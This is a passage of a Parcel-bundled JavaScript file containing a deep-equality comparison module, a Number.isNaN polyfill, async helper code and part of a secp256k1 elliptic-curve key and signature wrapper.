// reasonable to interpret their underlying memory in the same way,
// which is checked by comparing their type tags.
// (e.g. a Uint8Array and a Uint16Array with the same memory content
// could still be different because they will be interpreted differently).
//
// For strict comparison, objects should have
// a) The same built-in type tags
// b) The same prototypes.
function $2be9aa30bff457b9$var$innerDeepEqual(val1, val2, strict, memos) {
    // All identical values are equivalent, as determined by ===.
    if (val1 === val2) {
        if (val1 !== 0) return true;
        return strict ? $2be9aa30bff457b9$var$objectIs(val1, val2) : true;
    } // Check more closely if val1 and val2 are equal.
    if (strict) {
        if ($2be9aa30bff457b9$var$_typeof(val1) !== "object") return typeof val1 === "number" && $2be9aa30bff457b9$var$numberIsNaN(val1) && $2be9aa30bff457b9$var$numberIsNaN(val2);
        if ($2be9aa30bff457b9$var$_typeof(val2) !== "object" || val1 === null || val2 === null) return false;
        if (Object.getPrototypeOf(val1) !== Object.getPrototypeOf(val2)) return false;
    } else {
        if (val1 === null || $2be9aa30bff457b9$var$_typeof(val1) !== "object") {
            if (val2 === null || $2be9aa30bff457b9$var$_typeof(val2) !== "object") // eslint-disable-next-line eqeqeq
            return val1 == val2;
            return false;
        }
        if (val2 === null || $2be9aa30bff457b9$var$_typeof(val2) !== "object") return false;
    }
    var val1Tag = $2be9aa30bff457b9$var$objectToString(val1);
    var val2Tag = $2be9aa30bff457b9$var$objectToString(val2);
    if (val1Tag !== val2Tag) return false;
    if (Array.isArray(val1)) {
        // Check for sparse arrays and general fast path
        if (val1.length !== val2.length) return false;
        var keys1 = $2be9aa30bff457b9$var$getOwnNonIndexProperties(val1, $2be9aa30bff457b9$var$ONLY_ENUMERABLE);
        var keys2 = $2be9aa30bff457b9$var$getOwnNonIndexProperties(val2, $2be9aa30bff457b9$var$ONLY_ENUMERABLE);
        if (keys1.length !== keys2.length) return false;
        return $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, $2be9aa30bff457b9$var$kIsArray, keys1);
    } // [browserify] This triggers on certain types in IE (Map/Set) so we don't
    // wan't to early return out of the rest of the checks. However we can check
    // if the second value is one of these values and the first isn't.
    if (val1Tag === "[object Object]") {
        // return keyCheck(val1, val2, strict, memos, kNoIterator);
        if (!$2be9aa30bff457b9$var$isMap(val1) && $2be9aa30bff457b9$var$isMap(val2) || !$2be9aa30bff457b9$var$isSet(val1) && $2be9aa30bff457b9$var$isSet(val2)) return false;
    }
    if ($2be9aa30bff457b9$var$isDate(val1)) {
        if (!$2be9aa30bff457b9$var$isDate(val2) || Date.prototype.getTime.call(val1) !== Date.prototype.getTime.call(val2)) return false;
    } else if ($2be9aa30bff457b9$var$isRegExp(val1)) {
        if (!$2be9aa30bff457b9$var$isRegExp(val2) || !$2be9aa30bff457b9$var$areSimilarRegExps(val1, val2)) return false;
    } else if ($2be9aa30bff457b9$var$isNativeError(val1) || val1 instanceof Error) {
        // Do not compare the stack as it might differ even though the error itself
        // is otherwise identical.
        if (val1.message !== val2.message || val1.name !== val2.name) return false;
    } else if ($2be9aa30bff457b9$var$isArrayBufferView(val1)) {
        if (!strict && ($2be9aa30bff457b9$var$isFloat32Array(val1) || $2be9aa30bff457b9$var$isFloat64Array(val1))) {
            if (!$2be9aa30bff457b9$var$areSimilarFloatArrays(val1, val2)) return false;
        } else if (!$2be9aa30bff457b9$var$areSimilarTypedArrays(val1, val2)) return false;
         // Buffer.compare returns true, so val1.length === val2.length. If they both
        // only contain numeric keys, we don't need to exam further than checking
        // the symbols.
        var _keys = $2be9aa30bff457b9$var$getOwnNonIndexProperties(val1, $2be9aa30bff457b9$var$ONLY_ENUMERABLE);
        var _keys2 = $2be9aa30bff457b9$var$getOwnNonIndexProperties(val2, $2be9aa30bff457b9$var$ONLY_ENUMERABLE);
        if (_keys.length !== _keys2.length) return false;
        return $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, $2be9aa30bff457b9$var$kNoIterator, _keys);
    } else if ($2be9aa30bff457b9$var$isSet(val1)) {
        if (!$2be9aa30bff457b9$var$isSet(val2) || val1.size !== val2.size) return false;
        return $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, $2be9aa30bff457b9$var$kIsSet);
    } else if ($2be9aa30bff457b9$var$isMap(val1)) {
        if (!$2be9aa30bff457b9$var$isMap(val2) || val1.size !== val2.size) return false;
        return $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, $2be9aa30bff457b9$var$kIsMap);
    } else if ($2be9aa30bff457b9$var$isAnyArrayBuffer(val1)) {
        if (!$2be9aa30bff457b9$var$areEqualArrayBuffers(val1, val2)) return false;
    } else if ($2be9aa30bff457b9$var$isBoxedPrimitive(val1) && !$2be9aa30bff457b9$var$isEqualBoxedPrimitive(val1, val2)) return false;
    return $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, $2be9aa30bff457b9$var$kNoIterator);
}
function $2be9aa30bff457b9$var$getEnumerables(val, keys) {
    return keys.filter(function(k) {
        return $2be9aa30bff457b9$var$propertyIsEnumerable(val, k);
    });
}
function $2be9aa30bff457b9$var$keyCheck(val1, val2, strict, memos, iterationType, aKeys) {
    // For all remaining Object pairs, including Array, objects and Maps,
    // equivalence is determined by having:
    // a) The same number of owned enumerable properties
    // b) The same set of keys/indexes (although not necessarily the same order)
    // c) Equivalent values for every corresponding key/index
    // d) For Sets and Maps, equal contents
    // Note: this accounts for both named and indexed properties on Arrays.
    if (arguments.length === 5) {
        aKeys = Object.keys(val1);
        var bKeys = Object.keys(val2); // The pair must have the same number of owned properties.
        if (aKeys.length !== bKeys.length) return false;
    } // Cheap key test
    var i = 0;
    for(; i < aKeys.length; i++){
        if (!$2be9aa30bff457b9$var$hasOwnProperty(val2, aKeys[i])) return false;
    }
    if (strict && arguments.length === 5) {
        var symbolKeysA = $2be9aa30bff457b9$var$objectGetOwnPropertySymbols(val1);
        if (symbolKeysA.length !== 0) {
            var count = 0;
            for(i = 0; i < symbolKeysA.length; i++){
                var key = symbolKeysA[i];
                if ($2be9aa30bff457b9$var$propertyIsEnumerable(val1, key)) {
                    if (!$2be9aa30bff457b9$var$propertyIsEnumerable(val2, key)) return false;
                    aKeys.push(key);
                    count++;
                } else if ($2be9aa30bff457b9$var$propertyIsEnumerable(val2, key)) return false;
            }
            var symbolKeysB = $2be9aa30bff457b9$var$objectGetOwnPropertySymbols(val2);
            if (symbolKeysA.length !== symbolKeysB.length && $2be9aa30bff457b9$var$getEnumerables(val2, symbolKeysB).length !== count) return false;
        } else {
            var _symbolKeysB = $2be9aa30bff457b9$var$objectGetOwnPropertySymbols(val2);
            if (_symbolKeysB.length !== 0 && $2be9aa30bff457b9$var$getEnumerables(val2, _symbolKeysB).length !== 0) return false;
        }
    }
    if (aKeys.length === 0 && (iterationType === $2be9aa30bff457b9$var$kNoIterator || iterationType === $2be9aa30bff457b9$var$kIsArray && val1.length === 0 || val1.size === 0)) return true;
     // Use memos to handle cycles.
    if (memos === undefined) memos = {
        val1: new Map(),
        val2: new Map(),
        position: 0
    };
    else {
        // We prevent up to two map.has(x) calls by directly retrieving the value
        // and checking for undefined. The map can only contain numbers, so it is
        // safe to check for undefined only.
        var val2MemoA = memos.val1.get(val1);
        if (val2MemoA !== undefined) {
            var val2MemoB = memos.val2.get(val2);
            if (val2MemoB !== undefined) return val2MemoA === val2MemoB;
        }
        memos.position++;
    }
    memos.val1.set(val1, memos.position);
    memos.val2.set(val2, memos.position);
    var areEq = $2be9aa30bff457b9$var$objEquiv(val1, val2, strict, aKeys, memos, iterationType);
    memos.val1.delete(val1);
    memos.val2.delete(val2);
    return areEq;
}
function $2be9aa30bff457b9$var$setHasEqualElement(set, val1, strict, memo) {
    // Go looking.
    var setValues = $2be9aa30bff457b9$var$arrayFromSet(set);
    for(var i = 0; i < setValues.length; i++){
        var val2 = setValues[i];
        if ($2be9aa30bff457b9$var$innerDeepEqual(val1, val2, strict, memo)) {
            // Remove the matching element to make sure we do not check that again.
            set.delete(val2);
            return true;
        }
    }
    return false;
} // See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equality_using
// Sadly it is not possible to detect corresponding values properly in case the
// type is a string, number, bigint or boolean. The reason is that those values
// can match lots of different string values (e.g., 1n == '+00001').
function $2be9aa30bff457b9$var$findLooseMatchingPrimitives(prim) {
    switch($2be9aa30bff457b9$var$_typeof(prim)){
        case "undefined":
            return null;
        case "object":
            // Only pass in null as object!
            return undefined;
        case "symbol":
            return false;
        case "string":
            prim = +prim;
        // Loose equal entries exist only if the string is possible to convert to
        // a regular number and not NaN.
        // Fall through
        case "number":
            if ($2be9aa30bff457b9$var$numberIsNaN(prim)) return false;
    }
    return true;
}
function $2be9aa30bff457b9$var$setMightHaveLoosePrim(a, b, prim) {
    var altValue = $2be9aa30bff457b9$var$findLooseMatchingPrimitives(prim);
    if (altValue != null) return altValue;
    return b.has(altValue) && !a.has(altValue);
}
function $2be9aa30bff457b9$var$mapMightHaveLoosePrim(a, b, prim, item, memo) {
    var altValue = $2be9aa30bff457b9$var$findLooseMatchingPrimitives(prim);
    if (altValue != null) return altValue;
    var curB = b.get(altValue);
    if (curB === undefined && !b.has(altValue) || !$2be9aa30bff457b9$var$innerDeepEqual(item, curB, false, memo)) return false;
    return !a.has(altValue) && $2be9aa30bff457b9$var$innerDeepEqual(item, curB, false, memo);
}
function $2be9aa30bff457b9$var$setEquiv(a, b, strict, memo) {
    // This is a lazily initiated Set of entries which have to be compared
    // pairwise.
    var set = null;
    var aValues = $2be9aa30bff457b9$var$arrayFromSet(a);
    for(var i = 0; i < aValues.length; i++){
        var val = aValues[i]; // Note: Checking for the objects first improves the performance for object
        // heavy sets but it is a minor slow down for primitives. As they are fast
        // to check this improves the worst case scenario instead.
        if ($2be9aa30bff457b9$var$_typeof(val) === "object" && val !== null) {
            if (set === null) set = new Set();
             // If the specified value doesn't exist in the second set its an not null
            // object (or non strict only: a not matching primitive) we'll need to go
            // hunting for something thats deep-(strict-)equal to it. To make this
            // O(n log n) complexity we have to copy these values in a new set first.
            set.add(val);
        } else if (!b.has(val)) {
            if (strict) return false; // Fast path to detect missing string, symbol, undefined and null values.
            if (!$2be9aa30bff457b9$var$setMightHaveLoosePrim(a, b, val)) return false;
            if (set === null) set = new Set();
            set.add(val);
        }
    }
    if (set !== null) {
        var bValues = $2be9aa30bff457b9$var$arrayFromSet(b);
        for(var _i = 0; _i < bValues.length; _i++){
            var _val = bValues[_i]; // We have to check if a primitive value is already
            // matching and only if it's not, go hunting for it.
            if ($2be9aa30bff457b9$var$_typeof(_val) === "object" && _val !== null) {
                if (!$2be9aa30bff457b9$var$setHasEqualElement(set, _val, strict, memo)) return false;
            } else if (!strict && !a.has(_val) && !$2be9aa30bff457b9$var$setHasEqualElement(set, _val, strict, memo)) return false;
        }
        return set.size === 0;
    }
    return true;
}
function $2be9aa30bff457b9$var$mapHasEqualEntry(set, map, key1, item1, strict, memo) {
    // To be able to handle cases like:
    //   Map([[{}, 'a'], [{}, 'b']]) vs Map([[{}, 'b'], [{}, 'a']])
    // ... we need to consider *all* matching keys, not just the first we find.
    var setValues = $2be9aa30bff457b9$var$arrayFromSet(set);
    for(var i = 0; i < setValues.length; i++){
        var key2 = setValues[i];
        if ($2be9aa30bff457b9$var$innerDeepEqual(key1, key2, strict, memo) && $2be9aa30bff457b9$var$innerDeepEqual(item1, map.get(key2), strict, memo)) {
            set.delete(key2);
            return true;
        }
    }
    return false;
}
function $2be9aa30bff457b9$var$mapEquiv(a, b, strict, memo) {
    var set = null;
    var aEntries = $2be9aa30bff457b9$var$arrayFromMap(a);
    for(var i = 0; i < aEntries.length; i++){
        var _aEntries$i = $2be9aa30bff457b9$var$_slicedToArray(aEntries[i], 2), key = _aEntries$i[0], item1 = _aEntries$i[1];
        if ($2be9aa30bff457b9$var$_typeof(key) === "object" && key !== null) {
            if (set === null) set = new Set();
            set.add(key);
        } else {
            // By directly retrieving the value we prevent another b.has(key) check in
            // almost all possible cases.
            var item2 = b.get(key);
            if (item2 === undefined && !b.has(key) || !$2be9aa30bff457b9$var$innerDeepEqual(item1, item2, strict, memo)) {
                if (strict) return false; // Fast path to detect missing string, symbol, undefined and null
                // keys.
                if (!$2be9aa30bff457b9$var$mapMightHaveLoosePrim(a, b, key, item1, memo)) return false;
                if (set === null) set = new Set();
                set.add(key);
            }
        }
    }
    if (set !== null) {
        var bEntries = $2be9aa30bff457b9$var$arrayFromMap(b);
        for(var _i2 = 0; _i2 < bEntries.length; _i2++){
            var _bEntries$_i = $2be9aa30bff457b9$var$_slicedToArray(bEntries[_i2], 2), key = _bEntries$_i[0], item = _bEntries$_i[1];
            if ($2be9aa30bff457b9$var$_typeof(key) === "object" && key !== null) {
                if (!$2be9aa30bff457b9$var$mapHasEqualEntry(set, a, key, item, strict, memo)) return false;
            } else if (!strict && (!a.has(key) || !$2be9aa30bff457b9$var$innerDeepEqual(a.get(key), item, false, memo)) && !$2be9aa30bff457b9$var$mapHasEqualEntry(set, a, key, item, false, memo)) return false;
        }
        return set.size === 0;
    }
    return true;
}
function $2be9aa30bff457b9$var$objEquiv(a, b, strict, keys, memos, iterationType) {
    // Sets and maps don't have their entries accessible via normal object
    // properties.
    var i = 0;
    if (iterationType === $2be9aa30bff457b9$var$kIsSet) {
        if (!$2be9aa30bff457b9$var$setEquiv(a, b, strict, memos)) return false;
    } else if (iterationType === $2be9aa30bff457b9$var$kIsMap) {
        if (!$2be9aa30bff457b9$var$mapEquiv(a, b, strict, memos)) return false;
    } else if (iterationType === $2be9aa30bff457b9$var$kIsArray) for(; i < a.length; i++){
        if ($2be9aa30bff457b9$var$hasOwnProperty(a, i)) {
            if (!$2be9aa30bff457b9$var$hasOwnProperty(b, i) || !$2be9aa30bff457b9$var$innerDeepEqual(a[i], b[i], strict, memos)) return false;
        } else if ($2be9aa30bff457b9$var$hasOwnProperty(b, i)) return false;
        else {
            // Array is sparse.
            var keysA = Object.keys(a);
            for(; i < keysA.length; i++){
                var key = keysA[i];
                if (!$2be9aa30bff457b9$var$hasOwnProperty(b, key) || !$2be9aa30bff457b9$var$innerDeepEqual(a[key], b[key], strict, memos)) return false;
            }
            if (keysA.length !== Object.keys(b).length) return false;
            return true;
        }
    }
     // The pair must have equivalent values for every corresponding key.
    // Possibly expensive deep test:
    for(i = 0; i < keys.length; i++){
        var _key = keys[i];
        if (!$2be9aa30bff457b9$var$innerDeepEqual(a[_key], b[_key], strict, memos)) return false;
    }
    return true;
}
function $2be9aa30bff457b9$var$isDeepEqual(val1, val2) {
    return $2be9aa30bff457b9$var$innerDeepEqual(val1, val2, $2be9aa30bff457b9$var$kLoose);
}
function $2be9aa30bff457b9$var$isDeepStrictEqual(val1, val2) {
    return $2be9aa30bff457b9$var$innerDeepEqual(val1, val2, $2be9aa30bff457b9$var$kStrict);
}
module.exports = {
    isDeepEqual: $2be9aa30bff457b9$var$isDeepEqual,
    isDeepStrictEqual: $2be9aa30bff457b9$var$isDeepStrictEqual
};

});
parcelRequire.register("c8Cyq", function(module, exports) {
"use strict";

var $cOB0F = parcelRequire("cOB0F");

var $1UbTr = parcelRequire("1UbTr");

var $8sYH2 = parcelRequire("8sYH2");

var $91M8b = parcelRequire("91M8b");

var $hCf9I = parcelRequire("hCf9I");
var $8d642377f5822430$var$polyfill = $cOB0F($91M8b(), Number);
/* http://www.ecma-international.org/ecma-262/6.0/#sec-number.isnan */ $1UbTr($8d642377f5822430$var$polyfill, {
    getPolyfill: $91M8b,
    implementation: $8sYH2,
    shim: $hCf9I
});
module.exports = $8d642377f5822430$var$polyfill;

});
parcelRequire.register("8sYH2", function(module, exports) {
"use strict";
/* http://www.ecma-international.org/ecma-262/6.0/#sec-number.isnan */ module.exports = function isNaN(value) {
    return value !== value;
};

});

parcelRequire.register("91M8b", function(module, exports) {
"use strict";

var $8sYH2 = parcelRequire("8sYH2");
module.exports = function getPolyfill() {
    if (Number.isNaN && Number.isNaN(NaN) && !Number.isNaN("a")) return Number.isNaN;
    return $8sYH2;
};

});

parcelRequire.register("hCf9I", function(module, exports) {
"use strict";

var $1UbTr = parcelRequire("1UbTr");

var $91M8b = parcelRequire("91M8b");
/* http://www.ecma-international.org/ecma-262/6.0/#sec-number.isnan */ module.exports = function shimNumberIsNaN() {
    var polyfill = $91M8b();
    $1UbTr(Number, {
        isNaN: polyfill
    }, {
        isNaN: function testIsNaN() {
            return Number.isNaN !== polyfill;
        }
    });
    return polyfill;
};

});




parcelRequire.register("dXQCW", function(module, exports) {
"use strict";
var $a2a99bb240f55e05$var$__awaiter = module.exports && module.exports.__awaiter || function(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
};
var $a2a99bb240f55e05$var$__generator = module.exports && module.exports.__generator || function(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(_)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
};
function $a2a99bb240f55e05$var$__export(m) {
    for(var p in m)if (!module.exports.hasOwnProperty(p)) module.exports[p] = m[p];
}
Object.defineProperty(module.exports, "__esModule", {
    value: true
});


var $f7USH = parcelRequire("f7USH");
var $a2a99bb240f55e05$var$SECP256K1_PRIVATE_KEY_SIZE = 32;
function $a2a99bb240f55e05$var$createPrivateKey() {
    return $a2a99bb240f55e05$var$__awaiter(this, void 0, void 0, function() {
        var pk;
        return $a2a99bb240f55e05$var$__generator(this, function(_a) {
            switch(_a.label){
                case 0:
                    return [
                        4 /*yield*/ ,
                        $f7USH.getRandomBytes($a2a99bb240f55e05$var$SECP256K1_PRIVATE_KEY_SIZE)
                    ];
                case 1:
                    pk = _a.sent();
                    if ((parcelRequire("6oMVP")).privateKeyVerify(pk)) return [
                        2 /*return*/ ,
                        pk
                    ];
                    return [
                        3 /*break*/ ,
                        0
                    ];
                case 2:
                    return [
                        2 /*return*/ 
                    ];
            }
        });
    });
}
module.exports.createPrivateKey = $a2a99bb240f55e05$var$createPrivateKey;
function $a2a99bb240f55e05$var$createPrivateKeySync() {
    while(true){
        var pk = $f7USH.getRandomBytesSync($a2a99bb240f55e05$var$SECP256K1_PRIVATE_KEY_SIZE);
        if ((parcelRequire("6oMVP")).privateKeyVerify(pk)) return pk;
    }
}
module.exports.createPrivateKeySync = $a2a99bb240f55e05$var$createPrivateKeySync;

$a2a99bb240f55e05$var$__export((parcelRequire("6oMVP")));

});
parcelRequire.register("6oMVP", function(module, exports) {


module.exports = (parcelRequire("fr4Yq"))((parcelRequire("ejO33")));

});
parcelRequire.register("fr4Yq", function(module, exports) {
const $b3cd3c4411d4f56b$var$errors = {
    IMPOSSIBLE_CASE: "Impossible case. Please create issue.",
    TWEAK_ADD: "The tweak was out of range or the resulted private key is invalid",
    TWEAK_MUL: "The tweak was out of range or equal to zero",
    CONTEXT_RANDOMIZE_UNKNOW: "Unknow error on context randomization",
    SECKEY_INVALID: "Private Key is invalid",
    PUBKEY_PARSE: "Public Key could not be parsed",
    PUBKEY_SERIALIZE: "Public Key serialization error",
    PUBKEY_COMBINE: "The sum of the public keys is not valid",
    SIG_PARSE: "Signature could not be parsed",
    SIGN: "The nonce generation function failed, or the private key was invalid",
    RECOVER: "Public key could not be recover",
    ECDH: "Scalar was invalid (zero or overflow)"
};
function $b3cd3c4411d4f56b$var$assert(cond, msg) {
    if (!cond) throw new Error(msg);
}
function $b3cd3c4411d4f56b$var$isUint8Array(name, value, length) {
    $b3cd3c4411d4f56b$var$assert(value instanceof Uint8Array, `Expected ${name} to be an Uint8Array`);
    if (length !== undefined) {
        if (Array.isArray(length)) {
            const numbers = length.join(", ");
            const msg = `Expected ${name} to be an Uint8Array with length [${numbers}]`;
            $b3cd3c4411d4f56b$var$assert(length.includes(value.length), msg);
        } else {
            const msg = `Expected ${name} to be an Uint8Array with length ${length}`;
            $b3cd3c4411d4f56b$var$assert(value.length === length, msg);
        }
    }
}
function $b3cd3c4411d4f56b$var$isCompressed(value) {
    $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(value) === "Boolean", "Expected compressed to be a Boolean");
}
function $b3cd3c4411d4f56b$var$getAssertedOutput(output = (len)=>new Uint8Array(len), length) {
    if (typeof output === "function") output = output(length);
    $b3cd3c4411d4f56b$var$isUint8Array("output", output, length);
    return output;
}
function $b3cd3c4411d4f56b$var$toTypeString(value) {
    return Object.prototype.toString.call(value).slice(8, -1);
}
module.exports = (secp256k1)=>{
    return {
        contextRandomize (seed) {
            $b3cd3c4411d4f56b$var$assert(seed === null || seed instanceof Uint8Array, "Expected seed to be an Uint8Array or null");
            if (seed !== null) $b3cd3c4411d4f56b$var$isUint8Array("seed", seed, 32);
            switch(secp256k1.contextRandomize(seed)){
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.CONTEXT_RANDOMIZE_UNKNOW);
            }
        },
        privateKeyVerify (seckey) {
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            return secp256k1.privateKeyVerify(seckey) === 0;
        },
        privateKeyNegate (seckey) {
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            switch(secp256k1.privateKeyNegate(seckey)){
                case 0:
                    return seckey;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
            }
        },
        privateKeyTweakAdd (seckey, tweak) {
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            $b3cd3c4411d4f56b$var$isUint8Array("tweak", tweak, 32);
            switch(secp256k1.privateKeyTweakAdd(seckey, tweak)){
                case 0:
                    return seckey;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.TWEAK_ADD);
            }
        },
        privateKeyTweakMul (seckey, tweak) {
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            $b3cd3c4411d4f56b$var$isUint8Array("tweak", tweak, 32);
            switch(secp256k1.privateKeyTweakMul(seckey, tweak)){
                case 0:
                    return seckey;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.TWEAK_MUL);
            }
        },
        publicKeyVerify (pubkey) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            return secp256k1.publicKeyVerify(pubkey) === 0;
        },
        publicKeyCreate (seckey, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyCreate(output, seckey)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SECKEY_INVALID);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_SERIALIZE);
            }
        },
        publicKeyConvert (pubkey, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyConvert(output, pubkey)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_SERIALIZE);
            }
        },
        publicKeyNegate (pubkey, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyNegate(output, pubkey)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
                case 3:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_SERIALIZE);
            }
        },
        publicKeyCombine (pubkeys, compressed = true, output) {
            $b3cd3c4411d4f56b$var$assert(Array.isArray(pubkeys), "Expected public keys to be an Array");
            $b3cd3c4411d4f56b$var$assert(pubkeys.length > 0, "Expected public keys array will have more than zero items");
            for (const pubkey of pubkeys)$b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyCombine(output, pubkeys)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_COMBINE);
                case 3:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_SERIALIZE);
            }
        },
        publicKeyTweakAdd (pubkey, tweak, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isUint8Array("tweak", tweak, 32);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyTweakAdd(output, pubkey, tweak)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.TWEAK_ADD);
            }
        },
        publicKeyTweakMul (pubkey, tweak, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isUint8Array("tweak", tweak, 32);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.publicKeyTweakMul(output, pubkey, tweak)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.TWEAK_MUL);
            }
        },
        signatureNormalize (sig) {
            $b3cd3c4411d4f56b$var$isUint8Array("signature", sig, 64);
            switch(secp256k1.signatureNormalize(sig)){
                case 0:
                    return sig;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIG_PARSE);
            }
        },
        signatureExport (sig, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("signature", sig, 64);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, 72);
            const obj = {
                output: output,
                outputlen: 72
            };
            switch(secp256k1.signatureExport(obj, sig)){
                case 0:
                    return output.slice(0, obj.outputlen);
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIG_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
            }
        },
        signatureImport (sig, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("signature", sig);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, 64);
            switch(secp256k1.signatureImport(output, sig)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIG_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
            }
        },
        ecdsaSign (msg32, seckey, options = {}, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("message", msg32, 32);
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(options) === "Object", "Expected options to be an Object");
